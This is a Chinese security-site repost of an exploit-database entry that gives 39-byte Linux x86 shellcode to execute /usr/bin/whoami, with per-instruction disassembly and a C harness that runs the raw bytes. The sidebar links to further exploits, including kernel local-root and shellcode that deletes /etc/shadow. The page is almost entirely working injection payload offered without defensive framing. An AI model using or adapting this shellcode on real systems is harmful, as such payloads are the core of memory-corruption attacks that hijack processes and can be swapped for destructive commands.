首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 whoami shellcode 39 bytes
来源:http://devilzc0de.org 作者:gunslinger_ 发布时间:2010-06-04  


/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name   : 39 bytes whoami linux x86 shellcode
Date   : Thu Jun  3 05:38:48 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz to : flyff666, whitehat, ketek, chaer, peneter, and all devilzc0de crew
*/
#include <stdio.h>

char *shellcode=
  "\xeb\x11"                    /* jmp    0x8048073 */
  "\x31\xc0"                    /* xor    %eax,%eax */
  "\xb0\x0b"                    /* mov    $0xb,%al */
  "\x5b"                        /* pop    %ebx */
  "\x89\xd1"                    /* mov    %edx,%ecx */
  "\xcd\x80"                    /* int    $0x80 */
  "\x31\xc0"                    /* xor    %eax,%eax */
  "\xb0\x01"                    /* mov    $0x1,%al */
  "\x31\xdb"                    /* xor    %ebx,%ebx */
  "\xcd\x80"                    /* int    $0x80 */
  "\xe8\xea\xff\xff\xff"        /* call   0x8048062 */
  "\x2f"                        /* das     */
  "\x75\x73"                    /* jne    0x80480ee */
  "\x72\x2f"                    /* jb     0x80480ac */
  "\x62\x69\x6e"                /* bound  %ebp,0x6e(%ecx) */
  "\x2f"                        /* das     */
  "\x77\x68"                    /* ja     0x80480eb */
  "\x6f"                        /* outsl  %ds  "(%esi),(%dx) */
  "\x61"                        /* popa    */
  "\x6d"                        /* insl   (%dx),%es  "(%edi) */
  "\x69";                       /* .byte 0x69 */

int main(void)
{
  fprintf(stdout,"Length: %d\n",strlen(shellcode));
  ((void (*)(void)) shellcode)();
  return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Solaris/x86 - SystemV killall
·QtWeb 3.3 Remote DoS / Crash E
·x86 linux hard / unclean reboo
·x86 linux hard / unclean reboo
·Quick 'n Easy FTP Server Lite
·MP3 Studio v1.0 (mpf File) Loc
·Adobe InDesign CS3 INDD file h
·33 bytes unlink "/etc/shadow"
·S.O.M.P.L 1.0 Player Buffer Ov
·58 bytes sys_setdomainname ("t
·FeedDemon <= 3.1.0.12 Stack Bu
·linux/x86 "low" frequency syst
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved